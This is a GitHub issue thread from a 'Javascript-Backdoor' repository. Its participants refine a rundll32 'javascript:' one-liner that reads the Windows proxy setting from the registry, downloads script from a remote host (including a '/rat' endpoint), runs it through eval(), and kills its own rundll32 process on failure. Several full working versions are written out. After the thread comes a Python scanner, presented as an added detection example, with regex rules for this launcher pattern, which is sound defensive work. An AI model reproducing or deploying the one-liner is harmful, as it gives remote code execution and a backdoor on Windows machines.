3gstudent / Javascript-Backdoor

Learn from Casey Smith @subTee

Proxy Settings #2

Closed ghost closed 8 years ago

ghost commented 8 years ago

You may want to add the following to your script in order to work behind a proxy server.

```
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");v=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);h.Open("GET","http://127.0.0.1/connect",false);h.Send();B=h.ResponseText;eval(B)
```

This addition will add a registry read to get the proxy setting and incorporate that into subsequent requests.

Like this:

```
try {
  w = new ActiveXObject("WScript.Shell");
  v = w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer");
  q = v.split("=")[1].split(";")[0];
  h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  h.SetProxy(2,q);
  h.Open("GET","http://'+$Server+'/rat",false);
  h.Send();
```

Cheers,

Casey @subTee

L34Rn commented 8 years ago

nice!

3gstudent commented 8 years ago

@subTee many thanks. My test.js:

```
w = new ActiveXObject("WScript.Shell");
v = w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer");
//q = v.split("=")[1].split(";")[0];
var myMsgBox=new ActiveXObject("wscript.shell");
myMsgBox.Popup (v);
```

[screenshot 1]
I think the code `q = v.split("=")[1].split(";")[0];` should be ignored. I am very confused, because if it is not, it will throw the following error:

[screenshot 2]
Finally, I have to add another `try{}catch{}` to detect if it is behind a proxy server. So I think the full code is:

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");h.SetProxy(2,v);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```

[screenshot 3]
Thank you for your help :)

3gstudent

ghost commented 8 years ago

The reason for this code, `q = v.split("=")[1].split(";")[0];`, is that the proxy setting can contain multiple entries. For example:

```
http=127.0.0.1:8888;https=127.0.0.1:8888
```

So, you will need to handle that. Also, you will need to patch each request to use that proxy setting for all callbacks, not just the initial connect. Install the free tool Fiddler as an easy way to test a proxy: http://www.telerik.com/fiddler

Cheers

Casey

3gstudent commented 8 years ago

@subTee

You are right. The registry key can contain multiple IP addresses, so I need to parse it properly. The reason for my error is that my proxy setting doesn't contain the letters "http=". Here is the new code:

```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```
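From the detection side, the one-liners exchanged in this thread leave a very recognisable process-creation footprint: rundll32.exe launched with a `javascript:` URL, the `mshtml,RunHTMLApplication` export, a `WinHttp.WinHttpRequest` response handed straight to `eval()`, a registry read of the user's `ProxyServer` value, and, on failure, a `cmd /c taskkill /f /im rundll32.exe` child spawned by rundll32 itself. The following Python scanner is an added example written for this page; it is not code from this repository or from any of the thread's participants. The event records, their field names (`pid`, `image`, `parent`, `cmdline`) and the rule names are constructed for the example; real telemetry such as Sysmon Event ID 1 would have to be mapped onto those fields first.

```python
"""Flag process-creation events that match the rundll32 javascript: launcher pattern.

Added example for this issue thread: the rules below are written against the
command-line shapes quoted in the thread, not against any real-world telemetry.
"""
import re

# Constructed sample events (Sysmon Event ID 1 style, reduced to the fields the
# rules need). These are made up for the example, not captured telemetry.
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},   # benign use
    {"pid": 1002, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": (r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'
                 r'h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");'
                 r'w=new%20ActiveXObject("WScript.Shell");'
                 r'try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion'
                 r'\\Internet%20Settings\\ProxyServer");h.SetProxy(2,v);}catch(e){}'
                 r'h.Open("GET","http://127.0.0.1/connect",false);'
                 r'h.Send();B=h.ResponseText;eval(B)')},
    {"pid": 1003, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"cmd /c taskkill /f /im rundll32.exe"},               # self-termination branch
    {"pid": 1004, "image": r"C:\Windows\System32\taskkill.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"taskkill /f /im notepad.exe"},                       # unrelated taskkill
]

# Command-line rules. Each one targets a distinct element of the pattern so that
# a single hit stays "medium" and the full chain scores "high".
RULES = {
    # rundll32 given a javascript: URL is the launcher used throughout the thread
    "rundll32_javascript_url": re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I),
    # the mshtml export that turns that URL into script execution
    "mshtml_runhtmlapplication": re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I),
    # download-and-eval: WinHttpRequest response text fed to eval()
    "winhttp_response_eval": re.compile(r"WinHttp\.WinHttpRequest.*?eval\s*\(", re.I | re.S),
    # reading the user's ProxyServer value to route the callback through a proxy;
    # matches both the URL-encoded (%20) and the literal-space spelling
    "proxy_registry_read": re.compile(
        r"RegRead\(.*?Internet(?:%20|\s)Settings.*?ProxyServer", re.I),
}

# rundll32 spawning a shell that kills rundll32 is the failure branch of the one-liner
SELF_KILL = re.compile(r"\btaskkill\b.*?/im\s+rundll32(?:\.exe)?", re.I)


def match_rules(cmdline):
    """Return the names of all command-line rules that fire on cmdline."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def is_self_termination(event):
    """True when a child of rundll32.exe is asked to taskkill rundll32.exe."""
    parent_is_rundll32 = event["parent"].lower().endswith("rundll32.exe")
    return parent_is_rundll32 and bool(SELF_KILL.search(event["cmdline"]))


def analyze(events):
    """Scan events and return one finding per suspicious process, in input order."""
    findings = []
    for ev in events:
        hits = match_rules(ev["cmdline"])
        if is_self_termination(ev):
            hits.append("rundll32_self_kill")
        if not hits:
            continue
        severity = "high" if len(hits) >= 2 else "medium"
        findings.append({"pid": ev["pid"], "image": ev["image"],
                         "hits": hits, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f'pid={finding["pid"]} severity={finding["severity"]} '
              f'hits={",".join(finding["hits"])}')
```

On the constructed sample the benign `Control_RunDLL` launch and the unrelated `taskkill` produce no findings, the full one-liner fires all four command-line rules and scores high, and the `cmd /c taskkill` child of rundll32 is reported on its own as the self-termination branch. Because the one-liner lives entirely on the command line, process-creation logging with full command-line capture is the prerequisite for any of these rules to see it.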